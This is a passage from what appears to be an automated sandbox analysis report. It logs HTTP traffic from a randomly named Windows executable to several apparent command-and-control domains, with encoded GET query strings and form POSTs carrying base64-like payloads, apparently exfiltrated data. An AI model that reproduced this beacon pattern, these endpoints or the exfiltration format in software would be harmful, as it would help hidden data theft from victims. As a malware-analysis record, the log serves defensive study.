                                                                                                                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                                Nov 29, 2024 09:17:41.927114010 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                24192.168.2.449983161.97.168.245801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:43.352437973 CET509OUTGET /qrcg/?JZOtU=1fKHCnrcuLb+woCt8SH3V6St3YgMZevAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZI8W3E5DqygOdKGokIjk/qmeUzpHsRWuRdGo=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:17:44.585321903 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:44 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 2966
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: "66cd104a-b96"
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:17:44.585339069 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                                                                                Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                                                                                Nov 29, 2024 09:17:44.585351944 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                                                                                Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                25192.168.2.450002103.75.185.22801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:51.175553083 CET793OUTPOST /ydza/ HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.taxitayninh365.site
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 56 53 72 73 51 4a 31 51 6e 70 6b 71 72 5a 64 66 68 42 55 77 35 79 73 5a 2f 75 76 75 53 79 37 6f 6b 7a 69 70 36 2f 46 69 61 72 47 52 31 44 33 41 55 2f 44 48 65 52 78 31 4e 78 4f 36 45 55 2f 6e 54 33 71 41 32 4e 72 46 72 71 41 6a 42 5a 6a 4a 74 36 56 52 4d 76 6f 39 70 74 6c 76 42 74 49 6b 43 42 77 32 53 5a 62 41 63 32 33 78 2b 38 54 58 58 45 6e 58 48 59 58 30 65 6b 56 74 4f 64 63 41 51 53 4d 76 58 45 62 78 55 30 5a 33 34 36 69 52 30 55 63 4d 67 70 30 57 2b 35 6b 45 7a 44 65 4b 6c 35 37 58 58 72 62 55 4a 70 51 2f 7a 66 43 71 54 61 77 74 41 6a 39 67 62 38 6f 6b 48 31 4b 6b 33 51 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=VSrsQJ1QnpkqrZdfhBUw5ysZ/uvuSy7okzip6/FiarGR1D3AU/DHeRx1NxO6EU/nT3qA2NrFrqAjBZjJt6VRMvo9ptlvBtIkCBw2SZbAc23x+8TXXEnXHYX0ekVtOdcAQSMvXEbxU0Z346iR0UcMgp0W+5kEzDeKl57XXrbUJpQ/zfCqTawtAj9gb8okH1Kk3Q==


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                26192.168.2.450007103.75.185.22801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:53.840315104 CET813OUTPOST /ydza/ HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.taxitayninh365.site
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 56 53 72 73 51 4a 31 51 6e 70 6b 71 6b 5a 4e 66 6b 6d 41 77 6f 53 73 61 7a 4f 76 75 59 53 36 6a 6b 7a 75 70 36 37 56 49 5a 5a 79 52 30 6a 48 41 56 36 33 48 5a 52 78 31 44 52 4f 2f 5a 6b 2f 75 54 33 6d 69 32 4d 58 46 72 71 55 6a 42 62 72 4a 73 4a 39 4f 4f 2f 6f 7a 38 39 6c 74 4d 4e 49 6b 43 42 77 32 53 5a 50 2b 63 32 76 78 2b 4a 44 58 58 6e 2f 55 45 59 58 72 5a 6b 56 74 46 39 63 2b 51 53 4e 49 58 46 57 57 55 32 78 33 34 36 53 52 30 46 63 4c 70 70 30 51 36 35 6c 36 2b 67 62 4f 6f 4a 65 70 4a 71 76 61 4f 59 59 4f 32 5a 50 77 43 72 52 36 53 6a 5a 54 47 37 68 51 4b 32 33 74 73 51 4f 48 74 52 73 72 78 64 38 6b 7a 56 63 5a 78 42 7a 48 63 64 34 3d
                                                                                                                                                                                Data Ascii: JZOtU=VSrsQJ1QnpkqkZNfkmAwoSsazOvuYS6jkzup67VIZZyR0jHAV63HZRx1DRO/Zk/uT3mi2MXFrqUjBbrJsJ9OO/oz89ltMNIkCBw2SZP+c2vx+JDXXn/UEYXrZkVtF9c+QSNIXFWWU2x346SR0FcLpp0Q65l6+gbOoJepJqvaOYYO2ZPwCrR6SjZTG7hQK23tsQOHtRsrxd8kzVcZxBzHcd4=


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                27192.168.2.450012103.75.185.22801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:56.507061958 CET10895OUTPOST /ydza/ HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.taxitayninh365.site
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 56 53 72 73 51 4a 31 51 6e 70 6b 71 6b 5a 4e 66 6b 6d 41 77 6f 53 73 61 7a 4f 76 75 59 53 36 6a 6b 7a 75 70 36 37 56 49 5a 5a 4b 52 30 51 2f 41 55 5a 66 48 59 52 78 31 64 42 4f 2b 5a 6b 2b 73 54 7a 43 6d 32 4d 61 77 72 75 6b 6a 41 2b 6e 4a 72 38 42 4f 48 2f 6f 7a 2b 39 6c 73 42 74 49 78 43 42 67 79 53 5a 66 2b 63 32 76 78 2b 4f 37 58 41 6b 6e 55 49 34 58 30 65 6b 55 69 4f 64 63 46 51 55 6c 79 58 46 54 68 55 48 52 33 34 61 43 52 35 58 30 4c 78 35 30 53 39 35 6c 79 2b 6e 54 42 6f 4a 44 59 4a 71 61 78 4f 59 63 4f 30 74 47 2f 5a 5a 6c 6a 42 53 4e 73 55 35 6c 4a 50 45 50 65 6c 54 4f 47 70 77 6b 43 79 66 56 48 35 6c 42 50 6b 43 48 53 4c 70 4b 69 31 77 73 37 59 46 4a 78 2b 50 45 4f 57 56 73 2f 67 79 55 57 4c 48 69 38 56 34 4f 2f 45 78 72 44 73 64 74 66 6a 62 4d 78 2f 57 32 31 48 74 75 37 6a 78 32 4b 47 79 39 48 4f 72 5a 6d 58 4d 6f 67 30 78 49 6f 6d 48 69 37 69 4f 49 48 70 78 38 6a 74 4e 4c 4c 67 2f 4c 72 31 42 58 47 41 35 59 66 76 75 63 54 41 76 78 51 78 39 36 2f 6c 42 32 41 7a 6b 61 6c [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=VSrsQJ1QnpkqkZNfkmAwoSsazOvuYS6jkzup67VIZZKR0Q/AUZfHYRx1dBO+Zk+sTzCm2MawrukjA+nJr8BOH/oz+9lsBtIxCBgySZf+c2vx+O7XAknUI4X0ekUiOdcFQUlyXFThUHR34aCR5X0Lx50S95ly+nTBoJDYJqaxOYcO0tG/ZZljBSNsU5lJPEPelTOGpwkCyfVH5lBPkCHSLpKi1ws7YFJx+PEOWVs/gyUWLHi8V4O/ExrDsdtfjbMx/W21Htu7jx2KGy9HOrZmXMog0xIomHi7iOIHpx8jtNLLg/Lr1BXGA5YfvucTAvxQx96/lB2AzkalRbhB7+DosWF9ZTcHjJKQ0shzmwhKHCXfsBLxyLsiixq9cEqXJaNmrz90o+jwAdLsRieFz70QqnlDduG8MUb8t5mMcCxYtVqDAoLKTNSTtKy3suinF+1P6DP+cvRGN50NBLSWJ+zlKGguLMqbTagCnyy8Fp7Pqz0S6ePUJSGOJfQyc5ZlyGzqs2BhoDCgvupI/wNtvAAgBM8A9P32RaMg64wV0PrE/AYCns+POdQ1HCOcGlT8pP9DKlX4y0Ru5Jhw5rHX1mQx87sYr2YnF8E4TZDq/pKNlhfLZSBLBEb+z+ae7LEUe2dVtVudrSZMVmBpC02kIEU2rayDIgoz8pChOYVvH05raEMxmHibOUOT77L+wW47lAorWQNScaF6twbwIRP+kW+orjFGlLgU7pGS7M4fKLtEI2+8hJQ6fFF+lKLoRWJLj1wpE693dbMhQrMklZwiP1jrLeo+iTgw7Wz3tolg2DaepSikXM4BtKow6oLU8I+Lc9Zwzzsv2mVBmcT0BgDsWaZamDSiM5Hxxx8AmWNKK9VKzdFkF9W0DHKpEQ8V2Wy9DsSPZBpjkG1rn1qXXnnlzkPsp59zz2cFRyQAXcQ8tZnQtyAGppitW6mmTIwLyOiTdvGwR7GR4BrKij1b1eKQSRyhPfaY+ZibEJXP2vnm7p60rNnPEG [TRUNCATED]


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                28192.168.2.450017103.75.185.22801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:59.166904926 CET513OUTGET /ydza/?JZOtU=YQDMT/cjjLIrhYhQh0Q2mCJ/3eTpFU2r2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1Ov0k4N9JYf0vMjBOMK/CTnPE/e/ddHfEQpw=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:18:00.879511118 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 1238
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:00 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                                                                                                                                Nov 29, 2024 09:18:00.879605055 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                                                                                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                29192.168.2.450018155.94.253.4801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:06.598763943 CET790OUTPOST /fsgl/ HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 50 2f 34 4d 45 53 37 2b 73 6d 57 6f 32 2b 43 47 51 41 4e 36 31 69 5a 56 72 67 59 61 49 78 39 59 4f 44 74 4b 63 71 33 57 38 4b 72 46 51 53 59 6c 38 4a 59 78 63 37 6c 64 53 72 45 46 4a 56 68 32 75 32 46 4e 79 34 41 64 78 76 70 41 61 6a 50 74 33 37 73 6e 72 48 4b 53 4c 42 61 33 67 62 30 71 71 51 48 67 38 61 76 51 2b 64 53 58 39 6a 71 57 4b 4a 55 4f 52 53 4c 6e 68 61 70 66 36 36 54 48 38 53 44 51 7a 4c 34 74 43 74 6e 45 63 4b 46 76 42 57 49 31 37 4d 33 7a 2b 49 6c 7a 70 68 5a 49 6c 4b 43 47 57 43 48 51 50 5a 7a 4c 2b 43 68 72 59 66 68 4b 59 47 59 50 37 2b 51 44 57 55 50 4a 70 77 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=P/4MES7+smWo2+CGQAN61iZVrgYaIx9YODtKcq3W8KrFQSYl8JYxc7ldSrEFJVh2u2FNy4AdxvpAajPt37snrHKSLBa3gb0qqQHg8avQ+dSX9jqWKJUORSLnhapf66TH8SDQzL4tCtnEcKFvBWI17M3z+IlzphZIlKCGWCHQPZzL+ChrYfhKYGYP7+QDWUPJpw==
                                                                                                                                                                                Nov 29, 2024 09:18:07.839596033 CET1033INHTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:07 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                30192.168.2.450019155.94.253.4801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
